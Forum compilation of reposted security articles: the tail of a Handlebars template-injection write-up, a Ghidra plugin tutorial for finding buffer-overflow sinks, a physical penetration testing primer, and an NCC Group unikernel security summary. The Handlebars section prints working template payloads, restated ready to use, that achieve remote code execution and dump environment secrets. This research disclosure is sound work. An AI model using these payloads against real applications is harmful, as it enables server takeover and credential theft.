in the template scope. We can pass parameters to helpers like this {{helper "param1" "param2" ...params}}. So the first thing I tried was {{this.constructor.constructor "console.log(process.pid)"}} but it just returned console.log(process.pid) as a string. I went to the source code to find out what was happening. At the runtime.js file, there was the following function: lambda: function(current, context) { return typeof current === 'function' ? current.call(context) : current; } So what this function does is that it checks if the current object is of type 'function' and if so it just calls it using current.call(context) where context is the template scope, otherwise, it would just return the object itself. I looked further in the documentation of handlebars and found out that it had built in helpers such as "with", "blockHelperMissing", "forEach" ...etc After reading the source code for each helper, I had an exploitation in mind using the "with" helper as it is used to shift the context for a section of a template by using the built-in with block helper. So I would be able to perform curren.call(context) on my own context. So I tried the following: {{#with "console.log(process.pid)"}} {{#this.constructor.constructor}} {{#this}} {{/this}} {{/this.constructor.constructor}} {{/with}} Basically that should pass console.log(process.pid) as the current context, then when the handlebars compiler reaches this.constructor.constructor and finds that it's a function, it should call it with the current context as the function argument. Then using {{#with this}} we call the returned function from the Function constructor and console.log(process.pid) gets executed. However, this did not work because function.call() is used to invoke a method with an owner object as an argument, so the first argument is the owner object and other arguments are the parameters sent to the function being called. So if the function was called like current.call(this, context), the previous payload would have worked. I spent two more nights in Ubud then flew to Tokyo for the TrendMicro CTF. Again in Tokyo, I couldn't take objects and constructors out of my mind and kept trying to find a way to escape the sandbox. I had another idea of using Array.map() to call Function constructor on my context, but it didn't work because the compiler always passes an extra argument to any function I call which is an object containing the template scope which causes an error as my payload is considered a function argument not the function body. {{#with 1 as |int|}} {{#blockHelperMissing int as |array|}} // This line will create an array and then we can access its constructor {{#with (array.constructor "console.log(process.pid)")}} {{this.pop}} // pop unnecessary parameter pushed by the compiler {{array.map this.constructor.constructor array}} {{/with}} {{/blockHelperMissing}} {{/with}} There seemed to be many possible ways to escape the sandbox but I had one big problem facing me which is that whenever a function is called within the template, the template compiler sends the template scope Object as the last parameter. For example, if I try to call something like constructor.constructor("test","test"), the compiler will call it like constructor.constructor("test", "test", this) and since this will be converted to a string by calling Object.toString() and the anonymous function created will be: function anonymous(test,test){ [object Object] } which will cause an error. I tried many other things but still no luck, then I decided to open the JavaScript documentation for Object prototype and look for something that could help escape the sandbox. I found out that I could overwrite the Object.prototype.toString() function using Object.prototype.defineProperty() so that it calls a function that returns a user controlled string (my payload). Since I can't define functions using the template, all I have to do is to find a function that is already defined within the template scope and returns a user controlled input. For example, the following nodejs application should be vulnerable: test.js var handlebars = require('handlebars'), fs = require('fs'); var storeName = "console.log(process.pid)" // this should be a user-controlled string function getStoreName(){ return storeName; } var scope = { getStoreName: getStoreName } fs.readFile('example.html', 'utf-8', function(error, source){ var template = handlebars.compile(source); var html = template(data); console.log(html) }); example.html {{#with this as |test|}} // with is a helper that sets whichever assigned to it as the context, we name our context test. {{#with (test.constructor.getOwnPropertyDescriptor this "getStoreName")}} // get the context resulted from the evaluated function, in this case, the descriptor of this.getStoreName where this is the template scope defined in data variable in test.js {{#with (test.constructor.defineProperty test.constructor.prototype "toString" this)}} // overwrite Object.prototype.toString with "getStoreName()" defined in test.js {{#with (test.constructor.constructor "test")}} {{/with}} // call the Function constructor. {{/with}} {{/with}} {{/with}} Now if you run this template, console.log(process.pid) gets executed. $ node test.js 1337 I reported that to Shopify and mentioned that if there was a function within the scope that returns a user controlled string, it would have been possible to get RCE. Later, when I met Ibrahim (@the_st0rm) I told him about my idea and he told me that I can use bind() to create a new function that when called will return my RCE payload. From JavaScript documentation: The bind() method creates a new function that, when called, has its this keyword set to the provided value, with a given sequence of arguments preceding any provided when the new function is called. So now the idea is to create a string with whichever code I want to execute then bind its toString() to a function using bind() after that overwrite the Object.prototype.toString() function with that function. I spent a lot of time trying to apply this using handlebars templates, and eventually during my flight back to Egypt I was able to get a fully working PoC with no need to use functions defined in the template scope. {{#with this as |obj|}} {{#with (obj.constructor.keys "1") as |arr|}} {{arr.pop}} {{arr.push obj.constructor.name.constructor.bind}} {{arr.pop}} {{arr.push "console.log(process.env)"}} {{arr.pop}} {{#blockHelperMissing obj.constructor.name.constructor.bind}} {{#with (arr.constructor (obj.constructor.name.constructor.bind.apply obj.constructor.name.constructor arr))}} {{#with (obj.constructor.getOwnPropertyDescriptor this 0)}} {{#with (obj.constructor.defineProperty obj.constructor.prototype "toString" this)}} {{#with (obj.constructor.constructor "test")}} {{/with}} {{/with}} {{/with}} {{/with}} {{/blockHelperMissing}} {{/with}} {{/with}} Basically, what the template above does is: x = '' myToString = x.constructor.bind.apply(x.constructor, [x.constructor.bind,"console.log(process.pid)"]) myToStringArr = Array(myToString) myToStringDescriptor = Object.getOwnPropertyDescriptor(myToStringArr, 0) Object.defineProperty(Object.prototype, "toString", myToStringDescriptor) Object.constructor("test", this)() And when I tried it with Shopify, I got: Matias also texted me with an exploitation that he got which is much simpler than the one I used: {{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return JSON.stringify(process.env);"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} With that said, I was able to get RCE on Shopify's Return Magic application as well as some other websites that used handlebars as a template engine. The vulnerability was also submitted to npm security and handlebars pushed a fix that disables access to constructors. The advisory can be found here: https://www.npmjs.com/advisories/755 In a nutshell You can use the following to inject Handlebars templates: {{#with this as |obj|}} {{#with (obj.constructor.keys "1") as |arr|}} {{arr.pop}} {{arr.push obj.constructor.name.constructor.bind}} {{arr.pop}} {{arr.push "return JSON.stringify(process.env);"}} {{arr.pop}} {{#blockHelperMissing obj.constructor.name.constructor.bind}} {{#with (arr.constructor (obj.constructor.name.constructor.bind.apply obj.constructor.name.constructor arr))}} {{#with (obj.constructor.getOwnPropertyDescriptor this 0)}} {{#with (obj.constructor.defineProperty obj.constructor.prototype "toString" this)}} {{#with (obj.constructor.constructor "test")}} {{this}} {{/with}} {{/with}} {{/with}} {{/with}} {{/blockHelperMissing}} {{/with}} {{/with}} Matias also had his own exploitation that is much simpler: {{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return JSON.stringify(process.env);"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} Sorry for the long post, if you have any questions please drop me a tweet @Zombiehelp54 Sursa: https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html
  9. Ghidra Plugin Development for Vulnerability Research - Part-1 Overview On March 5th at the RSA security conference, the National Security Agency (NSA) released a reverse engineering tool called Ghidra. Similar to IDA Pro, Ghidra is a disassembler and decompiler with many powerful features (e.g., plugin support, graph views, cross references, syntax highlighting, etc.). Although Ghidra's plugin capabilities are powerful, there is little information published on its full capabilities. This blog post series will focus on Ghidra’s plugin development and how it can be used to help identify software vulnerabilities. In our previous post, we leveraged IDA Pro’s plugin functionality to identify sinks (potentially vulnerable functions or programming syntax). We then improved upon this technique in our follow up blog post to identify inline strcpy calls and identified a buffer overflow in Microsoft Office. In this post, we will use similar techniques with Ghidra’s plugin feature to identify sinks in CoreFTPServer v1.2 build 505. Ghidra Plugin Fundamentals Before we begin, we recommend going through the example Ghidra plugin scripts and the front page of the API documentation to understand the basics of writing a plugin. (Help -> Ghidra API Help) When a Ghidra plugin script runs, the current state of the program will be handled by the following five objects: currentProgram: the active program currentAddress: the address of the current cursor location in the tool currentLocation: the program location of the current cursor location in the tool, or null if no program location exists currentSelection: the current selection in the tool, or null if no selection exists currentHighlight: the current highlight in the tool, or null if no highlight exists It is important to note that Ghidra is written in Java, and its plugins can be written in Java or Jython. For the purposes of this post, we will be writing a plugin in Jython. There are three ways to use Ghidra’s Jython API: Using Python IDE (similar to IDA Python console): Loading a script from the script manager: Headless - Using Ghidra without a GUI: With an understanding of Ghidra plugin basics, we can now dive deeper into the source code by utilizing the script manager (Right Click on the script -> Edit with Basic Editor) The example plugin scripts are located under /path_to_ghidra/Ghidra/Features/Python/ghidra_scripts. (In the script manager, these are located under Examples/Python/😞 Ghidra Plugin Sink Detection In order to detect sinks, we first have to create a list of sinks that can be utilized by our plugin. For the purpose of this post, we will target the sinks that are known to produce buffer overflow vulnerabilities. These sinks can be found in various write-ups, books, and publications. Our plugin will first identify all function calls in a program and check against our list of sinks to filter out the targets. For each sink, we will identify all of their parent functions and called addresses. By the end of this process, we will have a plugin that can map the calling functions to sinks, and therefore identify sinks that could result in a buffer overflow. Locating Function Calls There are various methods to determine whether a program contains sinks. We will be focusing on the below methods, and will discuss each in detail in the following sections: Linear Search - Iterate over the text section (executable section) of the binary and check the instruction operand against our predefined list of sinks. Cross References (Xrefs) - Utilize Ghidra’s built in identification of cross references and query the cross references to sinks. Linear Search The first method of locating all function calls in a program is to do a sequential search. While this method may not be the ideal search technique, it is a great way of demonstrating some of the features in Ghidra’s API. Using the below code, we can print out all instructions in our program: listing = currentProgram.getListing() #get a Listing interface ins_list = listing.getInstructions(1) #get an Instruction iterator while ins_list.hasNext(): #go through each instruction and print it out to the console ins = ins_list.next() print (ins) Running the above script on CoreFTPServer gives us the following output: We can see that all of the x86 instructions in the program were printed out to the console. Next, we filter for sinks that are utilized in the program. It is important to check for duplicates as there could be multiple references to the identified sinks. Building upon the previous code, we now have the following: sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "lstrcpy", "strcpyW", #... ] duplicate = [] listing = currentProgram.getListing() ins_list = listing.getInstructions(1) while ins_list.hasNext(): ins = ins_list.next() ops = ins.getOpObjects(0) try: target_addr = ops[0] sink_func = listing.getFunctionAt(target_addr) sink_func_name = sink_func.getName() if sink_func_name in sinks and sink_func_name not in duplicate: duplicate.append(sink_func_name) print (sink_func_name,target_addr) except: pass Now that we have identified a list of sinks in our target binary, we have to locate where these functions are getting called. Since we are iterating through the executable section of the binary and checking every operand against the list of sinks, all we have to do is add a filter for the call instruction. Adding this check to the previous code gives us the following: sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy", #... ] duplicate = [] listing = currentProgram.getListing() ins_list = listing.getInstructions(1) #iterate through each instruction while ins_list.hasNext(): ins = ins_list.next() ops = ins.getOpObjects(0) mnemonic = ins.getMnemonicString() #check to see if the instruction is a call instruction if mnemonic == "CALL": try: target_addr = ops[0] sink_func = listing.getFunctionAt(target_addr) sink_func_name = sink_func.getName() #check to see if function being called is in the sinks list if sink_func_name in sinks and sink_func_name not in duplicate: duplicate.append(sink_func_name) print (sink_func_name,target_addr) except: pass Running the above script against CoreFTPServer v1.2 build 505 shows the results for all detected sinks: Unfortunately, the above code does not detect any sinks in the CoreFTPServer binary. However, we know that this particular version of CoreFTPServer is vulnerable to a buffer overflow and contains the lstrcpyA sink. So, why did our plugin fail to detect any sinks? After researching this question, we discovered that in order to identify the functions that are calling out to an external DLL, we need to use the function manager that specifically handles the external functions. To do this, we modified our code so that every time we see a call instruction we go through all external functions in our program and check them against the list of sinks. Then, if they are found in the list, we verify whether that the operand matches the address of the sink. The following is the modified section of the script: sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy", #... ] program_sinks = {} listing = currentProgram.getListing() ins_list = listing.getInstructions(1) ext_fm = fm.getExternalFunctions() #iterate through each of the external functions to build a dictionary #of external functions and their addresses while ext_fm.hasNext(): ext_func = ext_fm.next() target_func = ext_func.getName() #if the function is a sink then add it's address to a dictionary if target_func in sinks: loc = ext_func.getExternalLocation() sink_addr = loc.getAddress() sink_func_name = loc.getLabel() program_sinks[sink_addr] = sink_func_name #iterate through each instruction while ins_list.hasNext(): ins = ins_list.next() ops = ins.getOpObjects(0) mnemonic = ins.getMnemonicString() #check to see if the instruction is a call instruction if mnemonic == "CALL": try: #get address of operand target_addr = ops[0] #check to see if address exists in generated sink dictionary if program.sinks.get(target_addr): print (program_sinks[target_addr], target_addr,ins.getAddress()) except: pass Running the modified script against our program shows that we identified multiple sinks that could result in a buffer overflow. Xrefs The second and more efficient approach is to identify cross references to each sink and check which cross references are calling the sinks in our list. Because this approach does not search through the entire text section, it is more efficient. Using the below code, we can identify cross references to each sink: sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy", #... ] duplicate = [] func = getFirstFunction() while func is not None: func_name = func.getName() #check if function name is in sinks list if func_name in sinks and func_name not in duplicate: duplicate.append(func_name) entry_point = func.getEntryPoint() references = getReferencesTo(entry_point) #print cross-references print(references) #set the function to the next function func = getFunctionAfter(func) Now that we have identified the cross references, we can get an instruction for each reference and add a filter for the call instruction. A final modification is added to include the use of the external function manager: sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy", #... ] duplicate = [] fm = currentProgram.getFunctionManager() ext_fm = fm.getExternalFunctions() #iterate through each external function while ext_fm.hasNext(): ext_func = ext_fm.next() target_func = ext_func.getName() #check if the function is in our sinks list if target_func in sinks and target_func not in duplicate: duplicate.append(target_func) loc = ext_func.getExternalLocation() sink_func_addr = loc.getAddress() if sink_func_addr is None: sink_func_addr = ext_func.getEntryPoint() if sink_func_addr is not None: references = getReferencesTo(sink_func_addr) #iterate through all cross references to potential sink for ref in references: call_addr = ref.getFromAddress() ins = listing.getInstructionAt(call_addr) mnemonic = ins.getMnemonicString() #print the sink and address of the sink if #the instruction is a call instruction if mnemonic == “CALL”: print (target_func,sink_func_addr,call_addr) Running the modified script against CoreFTPServer gives us a list of sinks that could result in a buffer overflow: Mapping Calling Functions to Sinks So far, our Ghidra plugin can identify sinks. With this information, we can take it a step further by mapping the calling functions to the sinks. This allows security researchers to visualize the relationship between the sink and its incoming data. For the purpose of this post, we will use graphviz module to draw a graph. Putting it all together gives us the following code: from ghidra.program.model.address import Address from ghidra.program.model.listing.CodeUnit import * from ghidra.program.model.listing.Listing import * import sys import os #get ghidra root directory ghidra_default_dir = os.getcwd() #get ghidra jython directory jython_dir = os.path.join(ghidra_default_dir, "Ghidra", "Features", "Python", "lib", "Lib", "site-packages") #insert jython directory into system path sys.path.insert(0,jython_dir) from beautifultable import BeautifulTable from graphviz import Digraph sinks = [ "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "StrCpyW", "lstrcpy", "lstrcpyA", "lstrcpyW", #... ] sink_dic = {} duplicate = [] listing = currentProgram.getListing() ins_list = listing.getInstructions(1) #iterate over each instruction while ins_list.hasNext(): ins = ins_list.next() mnemonic = ins.getMnemonicString() ops = ins.getOpObjects(0) if mnemonic == "CALL": try: target_addr = ops[0] func_name = None if isinstance(target_addr,Address): code_unit = listing.getCodeUnitAt(target_addr) if code_unit is not None: ref = code_unit.getExternalReference(0) if ref is not None: func_name = ref.getLabel() else: func = listing.getFunctionAt(target_addr) func_name = func.getName() #check if function name is in our sinks list if func_name in sinks and func_name not in duplicate: duplicate.append(func_name) references = getReferencesTo(target_addr) for ref in references: call_addr = ref.getFromAddress() sink_addr = ops[0] parent_func_name = getFunctionBefore(call_addr).getName() #check sink dictionary for parent function name if sink_dic.get(parent_func_name): if sink_dic[parent_func_name].get(func_name): if call_addr not in sink_dic[parent_func_name][func_name]['call_address']: sink_dic[parent_func_name][func_name]['call_address'].append(call_addr) else: sink_dic[parent_func_name] = {func_name:{"address":sink_addr,"call_address":[call_addr]}} else: sink_dic[parent_func_name] = {func_name:{"address":sink_addr,"call_address":[call_addr]}} except: pass #instantiate graphiz graph = Digraph("ReferenceTree") graph.graph_attr['rankdir'] = 'LR' duplicate = 0 #Add sinks and parent functions to a graph for parent_func_name,sink_func_list in sink_dic.items(): #parent functions will be blue graph.node(parent_func_name,parent_func_name, style="filled",color="blue",fontcolor="white") for sink_name,sink_list in sink_func_list.items(): #sinks will be colored red graph.node(sink_name,sink_name,style="filled", color="red",fontcolor="white") for call_addr in sink_list['call_address']: if duplicate != call_addr: graph.edge(parent_func_name,sink_name, label=call_addr.toString()) duplicate = call_addr ghidra_default_path = os.getcwd() graph_output_file = os.path.join(ghidra_default_path, "sink_and_caller.gv") #create the graph and view it using graphiz graph.render(graph_output_file,view=True) Running the script against our program shows the following graph: We can see the calling functions are highlighted in blue and the sink is highlighted in red. The addresses of the calling functions are displayed on the line pointing to the sink. After conducting some manual analysis we were able to verify that several of the sinks identified by our Ghidra plugin produced a buffer overflow. The following screenshot of WinDBG shows that EIP is overwritten by 0x42424242 as a result of an lstrcpyA function call. Additional Features Although visualizing the result in a graph format is helpful for vulnerability analysis, it would also be useful if the user could choose different output formats. The Ghidra API provides several methods for interacting with a user and several ways of outputting data. We can leverage the Ghidra API to allow a user to choose an output format (e.g. text, JSON, graph) and display the result in the chosen format. The example below shows the dropdown menu with three different display formats. The full script is available at our github: Limitations There are multiple known issues with Ghidra, and one of the biggest issues for writing an analysis plugin like ours is that the Ghidra API does not always return the correct address of an identified standard function. Unlike IDA Pro, which has a database of function signatures (FLIRT signatures) from multiple libraries that can be used to detect the standard function calls, Ghidra only comes with a few export files (similar to signature files) for DLLs. Occasionally, the standard library detection will fail. By comparing IDA Pro and Ghidra’s disassembly output of CoreFTPServer, we can see that IDA Pro’s analysis successfully identified and mapped the function lstrcpyA using a FLIRT signature, whereas Ghidra shows a call to the memory address of the function lstrcpyA. Although the public release of Ghidra has limitations, we expect to see improvements that will enhance the standard library analysis and aid in automated vulnerability research. Conclusion Ghidra is a powerful reverse engineering tool that can be leveraged to identify potential vulnerabilities. Using Ghidra’s API, we were able to develop a plugin that identifies sinks and their parent functions and display the results in various formats. In our next blog post, we will conduct additional automated analysis using Ghidra and enhance the plugins vulnerability detection capabilities. Posted on April 5, 2019 by Somerset Recon and tagged Ghidra Reverse Engineering Plugin Vulnerability Analysis. Sursa: https://www.somersetrecon.com/blog/2019/ghidra-plugin-development-for-vulnerability-research-part-1
  10. How to Perform Physical Penetration Testing Guest Contributor: Chiheb Chebbi Abstract None can deny that physical security is playing a huge role and a necessary aspect of “Information Security” in general. This article will guide us through many important terminologies in physical security and show us how to perform Physical Penetration Testing. In this Article we are going to discover: Information security and Physical security: The Link Physical Security Overview Physical Penetration Testing Crime prevention through environmental design (CPTED) After reading this article you can use this document that contains many useful resources to help you learn more about Physical Security and physical penetration testing: Physical Security Information security and Physical security: The Link Before diving deep into exploring physical security, some points are needed to be discussed to avoid any confusion. Many information security new learners go with the assumption that the main role of information security professionals is securing computers, servers, and devices in general but they neglect the fact that the role of information security professional is to secure “Information” and information can be stored using different means including Papers, paper mail, bills, notebooks and so on. Also many don’t know that the most valuable asset in an organization is not a technical device and even it is not a multi-million datacenter but it is “The Human”. Yes! In Risk management, risks against Human should be mitigated first urgently. Thus, securing the physical environment is included in the tasks of Risk Managers and CISO’s (if I am mistaken please correct me) For more information, I highly recommend you to check this great paper from SANS Institut: Physical Security and Why It Is Important – SANS Institute Physical Security Overview By definition “Physical security is the protection of personnel, hardware, software, networks and data from physical actions and events that could cause serious loss or damage to an enterprise, agency or institution. This includes protection from fire, flood, natural disasters, burglary, theft, vandalism, and terrorism.” [https://searchsecurity.techtarget.com ] Physical security has three important components: Access control Surveillance Testing As you can see from the definition your job also is to secure the enterprise from natural disasters and physical accidents. Physical Threats The International Information System Security Certification Consortium, or (ISC)² describes the role of information security professionals in CISSP Study Guide (by Eric Conrad, Seth Misenar and Joshua Feldman) as the following: “Our job as information security professionals is to evaluate risks against our critical assets and deploy safeguards to mitigate those risks. We work in various roles: firewall engineers, penetration testers, auditors, management, etc. The common thread is risk: it is part of our job description.” Risks can be presented in a mathematical way using the following formula: Risk = Threat x Vulnerability (Sometimes we add another parameter called “Impact” but for now let’s just focus on Threats and vulnerabilities.) In your daily basis job you will face many Threats. (To avoid confusion between the Three terms Threat, Vulnerability, and Risk check the first section of this article How to build a Threat Hunting platform using ELK Stack) Some Physical Threats are the following: Natural Environmental threats: Disasters Floods Earthquakes Volcanoes Tsunamis Avalanches Politically motivated threats Supply and Transportation Threats Security Defenses To defend against physical Threats, you need to implement and deploy the right safeguards. For example, you can use a Defense in-depth approach. The major Physical safeguards are the following: Video Surveillance Fences Security Guards Lacks and Smart Locks Biometric Access Controls Different and well-chosen Windows Mitigating Power Loss and Excessing Guard dogs Lights Signs Man-traps Different Fire Suppressions and protection systems (Soda Acid, Water, Gas Halon): The Fire extinguishers should be chosen based on the class of fire: Class A – fires involving solid materials such as wood, paper or textiles. Class B – fires involving flammable liquids such as petrol, diesel or oils. Class C – fires involving gases. Class D – fires involving metals. Class E – fires involving live electrical apparatus. (Technically ‘Class E’ doesn’t exists, however, this is used for convenience here) Class F – fires involving cooking oils such as in deep-fat fryers. You can check the different fire extinguishers using this useful link: https://www.marsden-fire-safety.co.uk/resources/fire-extinguishers Access Control Access controls is vital when it comes to physical security. So I want to take this opportunity to talk a little bit about it. As you noticed maybe, many information security aspects are taking and inspired from the military (Teaming names: Red Team, Blue Team and so on). Also, Access control is inspired from the military. To represent security policies in a logical way we use what we call Security models mechanisms. These models are inspired from the Trusted Computing Base (TCB), which is described in the US Department of Defense Standard 5200.28. This standard is also known as the Orange Book. These are the most well know security models: Bell-LaPadula Model Biba Model Clark-Wilson Model To learn more about the Security model read this Document: https://media.techtarget.com/searchSecurity/downloads/29667C05.pdf Access controls are a form of technical security controls (a control as a noun means an entity that checks based on a standard). We have three Access Control categories Mandatory Access Control (MAC): The system checks the identity of a subject and its permissions with the object permissions. So usually, both subjects and objects have labels using a ranking system (top secret, confidential, and so on). Discretionary Access Control (DAC): The object owner is allowed to set permissions to users. Passwords are a form of DAC. Role-Based Access Control (RBAC): As its name indicates, the access is based on assigned roles. Physical Penetration Testing By now we acquired a fair understanding about many important aspects of physical security. Let’s move to another point which is how to perform a Physical Penetration testing. By definition: “A penetration test, or pen–test, is an attempt to evaluate the security of an IT infrastructure by safely trying to exploit vulnerabilities. These vulnerabilities may exist in operating systems, services and application flaws, improper configurations or risky end-user behavior.” [ www.coresecurity.com ] When it comes to penetration testing we have three types: White box pentesting: The pentester knows everything about the target including physical environment information, employees, IP addresses, Host and server information and so on (of course in the agreed scope) Black box pentesting: in this case, the pentester don’t know anything about the target Gray box pentesting: is the mix between the two types Usually, Penetration Testers use a Pentesting standard to follow when performing a penetration testing mission. Standards are a low-level description of how the organization will enforce the policy. In other words, they are used to maintain a minimum level of effective cybersecurity. To learn the difference between: Standard, Policy, procedure and guideline check this useful link : https://frsecure.com/blog/differentiating-between-policies-standards-procedures-and-guidelines/ As a penetration tester you can use from a great number of pentesting standards like: The Open Source Security Testing Methodology Manual (OSSTMM) The Information Systems Security Assessment Framework (ISSAF) The Penetration Testing Execution Standard (PTES) The Payment Card Industry Data Security Standard (PCI DSS) If you selected The Penetration Testing Execution Standard (PTES) for example (https://media.readthedocs.org/pdf/pentest-standard/latest/pentest-standard.pdf ) You need to follow the following steps and phases: Pre-engagement Interactions Intelligence Gathering Threat Modeling Vulnerability Analysis Exploitation Post Exploitation Reporting (Just click on any step to learn more about it) The Team You can’t perform a successful physical penetration testing mission without a great Team. Wil Allsopp in his great book Unauthorised Access Physical Penetration Testing For IT Security Teams gave a great operation team suggestion. He believes that every good physical penetration testing team should contain: Operator Team Leader Coordinator or Planner Social Engineer Computer Intrusion Specialist Physical Security Specialist Surveillance Specialist He also gave a great workflow so you can use it in your mission: Peerlyst is also loaded with great physical security Articles. The following are some of them: Most Locks are stupid easy to pick How to become a Hardware Security Specialist Hardware/Software vendor playbook: Handling vulnerabilities found in your products after launch The hardware security and firmware security wiki Becoming a Penetration Tester – Hardware Hacking Part 1 Best practices for securing hardware devices against physical intrusion [TOOL] Umbrella App: Digital and Physical Security Lessons and Advice in Your Pocket! Physical Security Blog. Part 1: Why the Physical Security Industry is Dysfunctional Physical Security: The Missing Piece From Your Cyber Security Puzzle Physical Security = Information Security, both have almost identical requirements How to get started with physical security How Physical security fails:2 Tales from a Sneaker Crime prevention through environmental design (CPTED) Crime prevention through environmental design (CPTED) is a set of design principles used to discourage crime. The concept is simple: Buildings and properties are designed to prevent damage from the force of the elements and natural disasters; they should also be designed to prevent crime. [William Deutsch] There are mainly 4 major principles: Natural Surveillance: Criminals will do everything to stay undetected so we need to keep them under observation by keeping many areas bright and by trying to eliminate hiding spots. Natural Access Control: relies on doors, fences, shrubs, and other physical elements to keep unauthorized persons out of a particular place if they do not have a legitimate reason for being there. Territorial Reinforcement: is done by giving spatial definitions such as the subdivision of space into different degrees of public/semi-public/ private areas Maintenance: the property should be well -maintained You can find the full Crime prevention through environmental design Guide in the references section below. Summary In this article we explored many aspects of physical security. We started by learning the relationship between Physical security and information security. Later we dived deep into many terminologies in physical security. Then, we discovered how to perform a physical penetration testing and the required team to do that successfully. Finally, we finished the article by giving a small glimpse about Crime prevention through environmental design. This article was originally posted on Peerlyst. Sursa: http://brilliancesecuritymagazine.com/op-ed/how-to-perform-physical-penetration-testing/
  11. Assessing Unikernel Security In this “modern” era of software development, the spotlight has bounced from virtual machines on clouds, to containers on clouds, to, currently, container orchestration… on clouds. As the “container wars” rage on, leaving behind multiple evolutionarily (or politically) dead-end implementations, unikernels are on the rise. Unikernels are applications built as specialized, minimal operating systems. While unikernels originated as an academic curiosity in the 90s, the modern crop are primarily focused on running as lightweight paravirtualized guests… on clouds. While some proponents of unikernels consider them to be the successor to containers, the two are, in fact, fairly different beasts with different tradeoffs. While containers make Unix/POSIX the base abstraction for applications, unikernels declare their own. Some unikernels focus on providing varying levels of POSIX compatibility, while others are based around specific programming languages, providing idiomatic APIs for applications written in those languages. However, the core concept of unikernels goes deeper: their main appeal is not the features that they provide, but rather, those that they don’t. Unikernels intentionally omit a great deal of the functionality typically found in full-featured operating systems, which their developers deemed to be not only unnecessary baggage, but also a potential security risk (as their presence substantially increases the system’s attack surface). Furthermore, those developers often attempt to simplify — and even completely reimplement — major OS components such as the network stack, throwing out what supporters call “cruft” and skeptics call “well-tested” or “mature” code. Advocates claim that unikernels are smaller, nimbler, and more secure by virtue of freeing themselves from the shackles of decades-old operating systems code. Such idealized claims are indeed appealing, but are they actually true? Our recently-posted whitepaper covers our initial foray into unikernels and focuses on the native aspects of application security as applied to them. Unikernel applications have a threat model unlike that of normal processes running on a standard operating system, Unix container or otherwise; in unikernels, general application code runs entirely within kernel space. We begin the whitepaper by describing the general threat model of unikernels as compared to that of containers. We then describe several relevant core security features and exploitation mitigations both within and provided by modern operating systems and build toolchains, and explore how these may apply to unikernels. This forms the basis of our methodology for assessing the general correctness and safety of unikernels. We go on to apply this testing methodology to two major open-source unikernel projects, Rumprun and IncludeOS. For each unikernel, we provide a suite of test cases to invoke and identify relevant security protections, and dig into their source and compiled code to uncover further issues. We also discuss unikernel-specific exploitation techniques and provide example exploit code for common memory corruption vulnerabilities. The presence of these vulnerability classes would enable reliable blind remote exploitation; that is, an attacker could gain arbitrary code execution in ring 0 without any direct knowledge of either the source code or the binary. Other notable vulnerabilities include a brute-force attack that takes advantage of unikernels’ ability to restart almost instantly, and a stack overflow that is able to stomp over the very copy instruction that caused it due to unusual section ordering. We then document a number of remediation and hardening recommendations for each unikernel and document our disclosure interactions with each project. As part of the latter, we assess the upstream patches made in response to our findings and recommendations. We introduce a series of our own patches that remediate a number of the issues we identified in Rumprun, many of which apply more generally to the Xen Mini-OS kernel on which it is based. These can be found here,1 here,2 and here.3 To conclude, we contrast the proclaimed security benefits of unikernels with our actual results. We also briefly describe our current and future research into the security pitfalls of another oft-touted “security feature” of unikernels: the complete reimplementation of mature, external-facing OS components such as the network stack. Even if this process does simplify and modernize the relevant code, as unikernel proponents claim, it also throws out decades of edge-case handling and security fixes that have accreted in response to security vulnerabilities. We are concerned that such re-implementation efforts do not show appropriate respect to the maturity of such codebases, and in doing so may reopen Pandora’s box. As a side note, we will shortly announce several issues that we identified in the MirageOS unikernel but did not cover in our ToorCon XX talk due to disclosure timelines. NCC Group regularly performs a large number of engagements assessing the security and hardening of applications and services, and the platforms they run on, in, and under, including containers, clouds, PaaSes, embedded runtimes, and specialized sandboxes, to name a few. The authors were drawn to this research by the potential and promise unikernel technology (still) has to build lightweight, performant, robust, and secure services in fundamentally new ways. If you’re building any of the above, especially anything unikernel-based, we’d love to help. https://github.com/nccgroup/rumprun↩ https://github.com/nccgroup/src-netbsd↩ https://github.com/nccgroup/buildrump.sh↩ Published date: 02 April 2019 Written by: Jeff Dileo and Spencer Michaels Sursa: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/april/assessing-unikernel-security/
